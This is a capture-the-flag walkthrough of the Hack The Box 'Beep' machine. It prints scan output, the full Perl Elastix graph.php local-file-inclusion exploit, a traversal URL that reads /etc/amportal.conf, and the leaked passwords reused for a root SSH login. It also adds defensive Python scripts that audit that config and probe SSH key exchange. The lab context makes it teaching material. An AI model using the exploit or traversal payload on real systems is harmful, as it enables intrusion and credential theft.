HTB Beep

$nmap -p- -T4 -A 10.10.10.7

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 18:18 CEST
Stats: 0:03:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 85.29% done; ETC: 18:22 (0:00:02 remaining)
Nmap scan report for 10.10.10.7
Host is up (0.042s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE TOP STLS USER EXPIRE(NEVER) PIPELINING RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) APOP UIDL
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: MAILBOX-REFERRALS THREAD=ORDEREDSUBJECT OK CONDSTORE URLAUTHA0001 CHILDREN MULTIAPPEND LIST-SUBSCRIBED NO X-NETSCAPE IMAP4 UIDPLUS IDLE UNSELECT LISTEXT RIGHTS=kxte ANNOTATEMORE CATENATE STARTTLS LITERAL+ SORT=MODSEQ NAMESPACE Completed THREAD=REFERENCES SORT IMAP4rev1 BINARY RENAME ACL ATOMIC QUOTA ID
443/tcp   open  ssl/https?
|_ssl-date: 2020-08-02T16:22:29+00:00; -1s from scanner time.
879/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 374.33 second

Results:

22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/https?
879/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)

$gobuster dir -u 10.10.10.7:443 -w /usr/share/wordlists/dirb/big.txt -e -o beep.out -k

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7:443
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/08/02 18:55:32 Starting gobuster
===============================================================
https://10.10.10.7:443/.htaccess (Status: 403)
https://10.10.10.7:443/.htpasswd (Status: 403)
https://10.10.10.7:443/admin (Status: 301)
https://10.10.10.7:443/cgi-bin/ (Status: 403)
https://10.10.10.7:443/configs (Status: 301)
https://10.10.10.7:443/favicon.ico (Status: 200)
https://10.10.10.7:443/help (Status: 301)
https://10.10.10.7:443/images (Status: 301)
https://10.10.10.7:443/lang (Status: 301)
https://10.10.10.7:443/libs (Status: 301)
https://10.10.10.7:443/mail (Status: 301)
https://10.10.10.7:443/modules (Status: 301)
https://10.10.10.7:443/panel (Status: 301)
https://10.10.10.7:443/recordings (Status: 301)
https://10.10.10.7:443/robots.txt (Status: 200)
https://10.10.10.7:443/static (Status: 301)
https://10.10.10.7:443/themes (Status: 301)
https://10.10.10.7:443/var (Status: 301)
https://10.10.10.7:443/vtigercrm (Status: 301)
===============================================================
2020/08/02 19:01:26 Finished
===============================================================

Open https://10.10.10.7/ in a browser.

So, this box contains an Elastix instance.

According to the Wikipedia description:

Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialing.

The Elastix 2.5 functionality is based on open source projects including Asterisk, FreePBX, HylaFAX, Openfire and Postfix. Those packages offer the PBX, fax, instant messaging and email functions, respectively.

https://en.wikipedia.org/wiki/Elastix

$searchsploit elastix

------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                                                                                    | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                                                  | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                            | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                         | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                                        | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                                       | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                                   | php/webapps/18650.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Let's try to obtain some extra information by exploiting the graph.php Local File Inclusion.

$searchsploit -x 37637

Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/37637
     Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
File Type: ASCII text, with CRLF line terminators

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Elastix 2.2.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl -w

#------------------------------------------------------------------------------------# 
#Elastix is an Open Source Sofware to establish Unified Communications. 
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;) 
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";

$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
# The licence header of amportal.conf contains this string, so its presence
# in the response means the include worked.
if ($answer =~ 'This file is part of FreePBX') {
    print "\n read amportal.conf file : $answer \n\n";
    print " successful read\n";
}
else {
    print "\n[-] not successful\n";
}

Open the following URL in the browser: https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Save the returned content to a new file to analyze it.

ePBX is free software: you can redistribute it and/or modify 
# it under the terms of the GNU General Public License as published by 
# the Free Software Foundation, either version 2 of the License, or 
# (at your option) any later version. 
# 
# FreePBX is distributed in the hope that it will be useful, 
# but WITHOUT ANY WARRANTY; without even the implied warranty of 
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
# GNU General Public License for more details. 
# 
# You should have received a copy of the GNU General Public License 
# along with FreePBX. If not, see . 
# 
# This file contains settings for components of the Asterisk Management Portal 
# Spaces are not allowed! 
# Run /usr/src/AMP/apply_conf.sh after making changes to this file 
# FreePBX Database configuration 
# AMPDBHOST: Hostname where the FreePBX database resides 
# AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql) 
# AMPDBNAME: Name of the FreePBX database (e.g. asterisk) 
# AMPDBUSER: Username used to connect to the FreePBX database 
# AMPDBPASS: Password for AMPDBUSER (above) 
# AMPENGINE: Telephony backend engine (e.g. asterisk) 
# AMPMGRUSER: Username to access the Asterisk Manager Interface 
# AMPMGRPASS: Password for AMPMGRUSER 
# AMPDBHOST=localhost AMPDBENGINE=mysql 
# AMPDBNAME=asterisk AMPDBUSER=asteriskuser 
# AMPDBPASS=amp109 AMPDBPASS=jEhdIekWmdjE AMPENGINE=asterisk AMPMGRUSER=admin #AMPMGRPASS=amp111 AMPMGRPASS=jEhdIekWmdjE 
# AMPBIN: Location of the FreePBX command line scripts 
# AMPSBIN: Location of (root) command line scripts 
# AMPBIN=/var/lib/asterisk/bin AMPSBIN=/usr/local/sbin 
# AMPWEBROOT: Path to Apache's webroot (leave off trailing slash)

Access 10.10.10.7 using the recovered credentials admin/jEhdIekWmdjE.
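The leaked file shows the two things a defender should catch before an attacker does: old default passwords left in the file as comments, and one secret guarding both the database (AMPDBPASS) and the Asterisk Manager Interface (AMPMGRPASS). Here is an added audit script (not part of the original write-up) that parses the amportal.conf layout (one KEY=VALUE per line, no spaces, '#' comments) and reports those findings; the sample text and the function names are my own.

```python
import re

# Old FreePBX/Elastix defaults; both appear commented out in the leaked file.
KNOWN_DEFAULTS = {"amp109", "amp111"}
SECRET_KEYS = ("AMPDBPASS", "AMPMGRPASS")

# Constructed sample in amportal.conf layout (KEY=VALUE, no spaces, '#' comments).
SAMPLE_CONF = """\
AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
"""
_ASSIGN = re.compile(r"^(#\s*)?([A-Z0-9_]+)=(\S*)$")

def parse_amportal(text):
    """Return (active {key: value}, commented {key: [values]})."""
    active, commented = {}, {}
    for line in text.splitlines():
        m = _ASSIGN.match(line.strip())
        if not m:
            continue  # blank line or free-text comment
        hash_prefix, key, value = m.groups()
        if hash_prefix:
            commented.setdefault(key, []).append(value)
        else:
            active[key] = value  # last assignment wins
    return active, commented

def audit(text):
    """Return findings for the secrets in an amportal.conf text."""
    active, commented = parse_amportal(text)
    findings, by_value = [], {}
    for key in SECRET_KEYS:
        val = active.get(key)
        if val is None:
            findings.append(f"{key}: not set")
        elif val in KNOWN_DEFAULTS:
            findings.append(f"{key}: known default value")
        else:
            by_value.setdefault(val, []).append(key)
        if any(v in KNOWN_DEFAULTS for v in commented.get(key, [])):
            findings.append(f"{key}: old default left in the file as a comment")
    for keys in by_value.values():  # one secret for DB and AMI is reuse
        if len(keys) > 1:
            findings.append("password reused across " + ", ".join(keys))
    return findings
```

Run `audit(open("/etc/amportal.conf").read())` on a real install; the root password being the same value again, as on this box, is the part no file-level check can see.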

$ssh root@10.10.10.7

Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Based on this message, we need to use one of the key exchange algorithms the server offers: diffie-hellman-group-exchange-sha1,
diffie-hellman-group14-sha1 or diffie-hellman-group1-sha1.

Although these are considered weak and are not enabled by default in current OpenSSH clients, this server supports nothing else, so one of them has to be enabled explicitly for this connection.

In this box, we just need to reuse the AMPDBPASS password to log in as root.
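To see which key-exchange methods a server offers without relying on the client's error text, here is an added check (not part of the original write-up) that reads the server's SSH_MSG_KEXINIT and flags the SHA-1 based exchanges; `probe`, `parse_kexinit` and the constructed sample packet are mine, and `probe` assumes the server sends its version line first.

```python
import socket
import struct

# The SHA-1 based DH exchanges offered by Beep's OpenSSH 4.3 (see the error above).
SHA1_KEX = {"diffie-hellman-group-exchange-sha1",
            "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"}

def parse_kexinit(packet):
    """Return the kex_algorithms name-list from a raw SSH_MSG_KEXINIT
    binary packet (RFC 4253: uint32 length, byte padding, payload, pad)."""
    length, padding = struct.unpack(">IB", packet[:5])
    payload = packet[5:5 + length - padding - 1]
    if not payload or payload[0] != 20:  # 20 == SSH_MSG_KEXINIT
        raise ValueError("not a KEXINIT packet")
    pos = 1 + 16  # message id + 16-byte cookie; kex_algorithms comes first
    (n,) = struct.unpack(">I", payload[pos:pos + 4])
    return payload[pos + 4:pos + 4 + n].decode("ascii").split(",")

def weak_kex(algorithms):
    """Subset of the offered algorithms that rely on SHA-1 key exchange."""
    return [a for a in algorithms if a in SHA1_KEX]

def build_kexinit(kex_list):
    """Encode a minimal, well-formed KEXINIT packet (other name-lists left
    empty) so the parser can be exercised offline on constructed input."""
    names = ",".join(kex_list).encode("ascii")
    body = b"\x14" + b"\x00" * 16 + struct.pack(">I", len(names)) + names
    body += b"\x00\x00\x00\x00" * 9 + b"\x00" + b"\x00\x00\x00\x00"
    pad = 8 - (5 + len(body)) % 8
    pad += 8 if pad < 4 else 0  # RFC 4253 requires at least 4 padding bytes
    return struct.pack(">IB", len(body) + pad + 1, pad) + body + b"\x00" * pad

def probe(host, port=22, timeout=5):
    """Read a live server's KEXINIT (pre-auth; no key exchange is completed)."""
    with socket.create_connection((host, port), timeout) as s:
        buf = b""
        while b"\n" not in buf:  # assumes the version line arrives first
            buf += s.recv(4096)
        _, _, data = buf.partition(b"\n")
        s.sendall(b"SSH-2.0-kexcheck\r\n")
        while len(data) < 4 or len(data) < struct.unpack(">I", data[:4])[0] + 4:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return weak_kex(parse_kexinit(data))
```

`probe("10.10.10.7")` on this box should return all three SHA-1 names; an empty list is what a current OpenSSH server with default settings yields.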

$ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7

The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg1pEJ0XXD5nFEjki/hI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.7' (RSA) to the list of known hosts.
root@10.10.10.7's password: 

Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# 

[root@beep ~]# cd /home
[root@beep home]# ls

fanis  spamfilter

[root@beep home]# cd fanis
[root@beep fanis]# cat user.txt

aeffXXXXXXXXXXXXXXXXXXXXXXXXXXXX

[root@beep fanis]# cd /root
[root@beep ~]# cat root.txt

d88eXXXXXXXXXXXXXXXXXXXXXXXXXXXX